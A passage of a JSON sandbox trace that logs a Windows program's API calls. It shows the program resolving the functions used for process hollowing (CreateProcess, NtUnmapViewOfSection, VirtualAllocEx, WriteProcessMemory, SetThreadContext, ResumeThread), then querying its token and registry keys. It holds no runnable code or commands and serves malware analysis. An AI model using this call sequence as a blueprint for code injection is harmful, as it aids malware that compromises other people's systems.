"FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 1165 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040788c", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1166 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040788f", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateToolhelp32Snapshot" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a30" } ], "repeated": 0, "id": 1167 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078a3", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1168 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078a6", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758791e0" } ], "repeated": 0, "id": 1169 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078ba", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1170 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078bd", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75877950" } ], "repeated": 0, "id": 1171 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078ce", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1172 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078d1", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcbd0" } ], "repeated": 0, "id": 1173 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078e5", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1174 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078e8", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcd70" } ], "repeated": 0, "id": 1175 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078fc", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1176 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078ff", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 1177 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407913", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1178 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407916", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 1179 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407927", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 1180 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040792a", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtUnmapViewOfSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c3480" } ], "repeated": 0, "id": 1181 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040793e", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1182 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407941", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAllocEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897390" } ], "repeated": 0, "id": 1183 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407955", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1184 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407958", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteProcessMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758975e0" } ], "repeated": 0, "id": 1185 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040796c", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1186 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040796f", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895c70" } ], "repeated": 0, "id": 1187 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407983", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1188 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407986", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758970c0" } ], "repeated": 0, "id": 1189 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407994", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1190 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407997", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ResumeThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881b90" } ], "repeated": 0, "id": 1191 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079ab", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1192 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079ae", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SuspendThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897230" } ], "repeated": 0, "id": 1193 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079c2", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1194 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079c5", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "TerminateProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75879910" } ], "repeated": 0, "id": 1195 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079d9", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1196 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079dc", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 1197 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079f3", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 1198 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079f6", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtReadVirtualMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c35d0" } ], "repeated": 0, "id": 1199 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a0a", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1200 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a0d", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsWow64Process" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880980" } ], "repeated": 0, "id": 1201 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a21", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1202 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a24", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758808d0" } ], "repeated": 0, "id": 1203 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a32", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1204 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a35", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DuplicateHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883160" } ], "repeated": 0, "id": 1205 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a45", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "psapi.dll" }, { "name": "BaseAddress", "value": "0x76280000" } ], "repeated": 0, "id": 1206 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a48", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "psapi.dll" }, { "name": "ModuleHandle", "value": "0x76280000" }, { "name": "FunctionName", "value": "GetProcessMemoryInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76281480" } ], "repeated": 0, "id": 1207 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a58", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1208 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a5b", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCommandLineW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882010" } ], "repeated": 0, "id": 1209 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a6e", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1210 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a71", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883820" } ], "repeated": 0, "id": 1211 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x000002d8" } ], "repeated": 0, "id": 1212 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1213 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "\\xd8D\\x18\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1214 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 1215 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000120" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 1216 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002d4" }, { "name": "ObjectAttributesName", "value": "{F38BF404-1D43-42F2-9305-67DE0B28FC23}" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}" } ], "repeated": 0, "id": 1217 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d4" } ], "repeated": 0, "id": 1218 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Category" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category" } ], "repeated": 0, "id": 1219 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Name" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Windows" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name" } ], "repeated": 0, "id": 1220 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder" } ], "repeated": 0, "id": 1221 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description" } ], "repeated": 0, "id": 1222 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath" } ], "repeated": 0, "id": 1223 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName" } ], "repeated": 0, "id": 1224 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip" } ], "repeated": 0, "id": 1225 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName" } ], "repeated": 0, "id": 1226 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon" } ], "repeated": 0, "id": 1227 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security" } ], "repeated": 0, "id": 1228 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": 